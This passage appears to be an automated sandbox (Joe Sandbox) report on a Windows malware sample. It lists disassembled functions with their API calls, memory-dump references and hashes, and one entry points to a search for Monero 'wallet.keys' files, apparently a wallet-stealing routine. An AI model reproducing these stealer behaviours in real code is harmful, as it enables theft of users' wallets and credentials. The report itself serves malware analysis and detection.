                      • StrCmpCA.SHLWAPI(?,007514B4), ref: 0073DB33
                      • StrCmpCA.SHLWAPI(?,007514B8), ref: 0073DB49
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0073DDCC
                      • FindClose.KERNEL32(000000FF), ref: 0073DDDE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID:
                      • API String ID: 3334442632-0
                      • Opcode ID: 954da46994f64ed514756002bc63c089c625e3720ed5fd9eb1d5f012a49b707a
                      • Instruction ID: 0a3a41a023dc791a8730fdbf4317286e0c6f9536161bf8526689472fab7ab1cb
                      • Opcode Fuzzy Hash: 954da46994f64ed514756002bc63c089c625e3720ed5fd9eb1d5f012a49b707a
                      • Instruction Fuzzy Hash: 7F9146B2950104EBEB15FB70EC5A9ED737DAB84300F408568F90A96141EF3C9B59CB93
                      Function 00AFF7B7 Relevance: 12.9, Strings: 9, Instructions: 1605COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 'Msf$8_I$Jv/$Q8}w$hJo7$lJo7$pt7Z$zY{s$okL
                      • API String ID: 0-2424283790
                      • Opcode ID: 5f5ccc8b945a9a36d0c49501c4e72d33d6530fb7b5aa4460808f97fe6f49e58c
                      • Instruction ID: 8aa5b15d82ecefde06c16a76741daee4eface6c6f9a849b295d416c27d940cae
                      • Opcode Fuzzy Hash: 5f5ccc8b945a9a36d0c49501c4e72d33d6530fb7b5aa4460808f97fe6f49e58c
                      • Instruction Fuzzy Hash: D0B215B3A0C2049FE304AE2DEC8567ABBE5EF94720F1A493DEAC4C7744E63558418797
                      Function 00747B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                      • GetKeyboardLayoutList.USER32(00000000,00000000,007505AF), ref: 00747BE1
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00747BF9
                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00747C0D
                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00747C62
                      • LocalFree.KERNEL32(00000000), ref: 00747D22
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                      • String ID: /
                      • API String ID: 3090951853-4001269591
                      • Opcode ID: 5aad05b861b8f67d7b8e89cd07a4b4f9e202b9495bad757aba6e8704bec68f7b
                      • Instruction ID: 5b78bbf0b36a3c56ddd5966f168c2ca906036524e80e61ccc42a3cfe5c8dc36d
                      • Opcode Fuzzy Hash: 5aad05b861b8f67d7b8e89cd07a4b4f9e202b9495bad757aba6e8704bec68f7b
                      • Instruction Fuzzy Hash: E9413C71954218EBDB24DF94DC99BEEB3B8FF44700F204199E50962291DB782F85CFA1
                      Function 00AF8AFE Relevance: 10.4, Strings: 7, Instructions: 1695COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 7Ot?$7Ot?$Rcj$UG;}$arw{$r%'^$u]"
                      • API String ID: 0-3911642341
                      • Opcode ID: 95a9eb96aeee402ddc1d5484956e442c76a4ee7b228065947436aa8c42398b6a
                      • Instruction ID: 683e8ee7140be3ffed3063fd29d7ac1e37ef6c393b99a5d49f55ccbb7d074d95
                      • Opcode Fuzzy Hash: 95a9eb96aeee402ddc1d5484956e442c76a4ee7b228065947436aa8c42398b6a
                      • Instruction Fuzzy Hash: 9BB207F3A082149FE3046E2DEC8567ABBE9EF94320F1A493DE6C5C3744EA7558018797
                      Function 0073E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00750D73), ref: 0073E4A2
                      • StrCmpCA.SHLWAPI(?,007514F8), ref: 0073E4F2
                      • StrCmpCA.SHLWAPI(?,007514FC), ref: 0073E508
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0073EBDF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                      • String ID: \*.*
                      • API String ID: 433455689-1173974218
                      • Opcode ID: d756d781b8b68d404593aaacf6403699739422fc1b446951d3099adb797bb322
                      • Instruction ID: cf786f6fef99a9f092e015b018479db214e7fd5ad132aab0fd9619c08fc6108d
                      • Opcode Fuzzy Hash: d756d781b8b68d404593aaacf6403699739422fc1b446951d3099adb797bb322
                      • Instruction Fuzzy Hash: 7C125172950118FAEB15FB60DC9AEED737CAF54300F4145A8B50A96092EF386F49CF92
                      Function 00739AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                      Download Yara Rule
                      APIs
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ns,00000000,00000000), ref: 00739AEF
                      • LocalAlloc.KERNEL32(00000040,?,?,?,00734EEE,00000000,?), ref: 00739B01
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ns,00000000,00000000), ref: 00739B2A
                      • LocalFree.KERNEL32(?,?,?,?,00734EEE,00000000,?), ref: 00739B3F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: BinaryCryptLocalString$AllocFree
                      • String ID: Ns
                      • API String ID: 4291131564-1137170065
                      • Opcode ID: 469c5e398c29fa6e40628de7327c9efbab003d73d52c27cb7c5cb8af02fdb27c
                      • Instruction ID: c4787a4aeeb88f3c8a88eaea842c65b36b23bca8c6babb5377c03c624cdceeb9
                      • Opcode Fuzzy Hash: 469c5e398c29fa6e40628de7327c9efbab003d73d52c27cb7c5cb8af02fdb27c
                      • Instruction Fuzzy Hash: 8911A4B4240208EFEB10CF64DC95FAAB7B5FB89700F208058FA199B390C7B5A941DB51
                      Function 00AFDC4D Relevance: 7.9, Strings: 5, Instructions: 1671COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 1Yj~$d9~$qG{$s601$}^K
                      • API String ID: 0-2696981074
                      • Opcode ID: 1e0e2b5c732634ffe622e732164bece3832fa5197c5a4981ffa92f3645108b44
                      • Instruction ID: 583872e26b06641b3bf446884c20d4f6037d4aef6641a4f16f8d5893894f0fb9
                      • Opcode Fuzzy Hash: 1e0e2b5c732634ffe622e732164bece3832fa5197c5a4981ffa92f3645108b44
                      • Instruction Fuzzy Hash: 26B206F3A0C2049FE304AE6DEC8567AF7E9EF94720F16853DEAC4C3744EA3558058696
                      Function 00AF6FE0 Relevance: 7.8, Strings: 5, Instructions: 1591COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: ?W_m$M}?v$Tb/$s6lY$j{
                      • API String ID: 0-3946083186
                      • Opcode ID: 00d8c89d2c52ff91ed435527904db3fd92c88451314f49174a87a7b6d910f12f
                      • Instruction ID: 07e38b63dbcbebd02307e49e148783c43c6a8025da0f843fe57cbdad777ce88f
                      • Opcode Fuzzy Hash: 00d8c89d2c52ff91ed435527904db3fd92c88451314f49174a87a7b6d910f12f
                      • Instruction Fuzzy Hash: A4B2F4F360C604AFE304AE29EC8577ABBE5EF94320F1A493DE6C5C7744EA3558018697
                      Function 00AF0400 Relevance: 7.8, Strings: 5, Instructions: 1570COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 1w>\$CEs$R@ov$q{$x_7
                      • API String ID: 0-745289873
                      • Opcode ID: 2278cb46203f2265a10ed2eb71a87ff6b6be7f4e84d011ecd5b7065a052cf130
                      • Instruction ID: d95d4d41abd886cb784def6fa5e07465a6930de777484a9c367f54532c3aab90
                      • Opcode Fuzzy Hash: 2278cb46203f2265a10ed2eb71a87ff6b6be7f4e84d011ecd5b7065a052cf130
                      • Instruction Fuzzy Hash: 1DB2D7F3A0C204AFE3046E29EC8567AFBE5EF94720F16893DE6C487744EA3558418797
                      Function 0073C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0073C871
                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0073C87C
                      • lstrcat.KERNEL32(?,00750B46), ref: 0073C943
                      • lstrcat.KERNEL32(?,00750B47), ref: 0073C957
                      • lstrcat.KERNEL32(?,00750B4E), ref: 0073C978
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$BinaryCryptStringlstrlen
                      • String ID:
                      • API String ID: 189259977-0
                      • Opcode ID: 41c3895d7b96e5119f825f15911ac360356f3ba4e6e3a40ad1033d3528fea77a
                      • Instruction ID: 5a930e368241d0a5210c9342e52a1b29f7a8dd7b39c45c48f1bc5011d8a2a9d1
                      • Opcode Fuzzy Hash: 41c3895d7b96e5119f825f15911ac360356f3ba4e6e3a40ad1033d3528fea77a
                      • Instruction Fuzzy Hash: FB4172B5D1421ADFDB10DF90DD89BFEB7B8BB84704F1041A8E509A7280D7745A84DF91
                      Function 00746920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                      Download Yara Rule
                      APIs
                      • GetSystemTime.KERNEL32(?), ref: 0074696C
                      • sscanf.NTDLL ref: 00746999
                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007469B2
                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007469C0
                      • ExitProcess.KERNEL32 ref: 007469DA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$System$File$ExitProcesssscanf
                      • String ID:
                      • API String ID: 2533653975-0
                      • Opcode ID: dfe886965b9171f28e7c5037f0b36543b6f23f5b5fa18be72d31a20d9d72b6e1
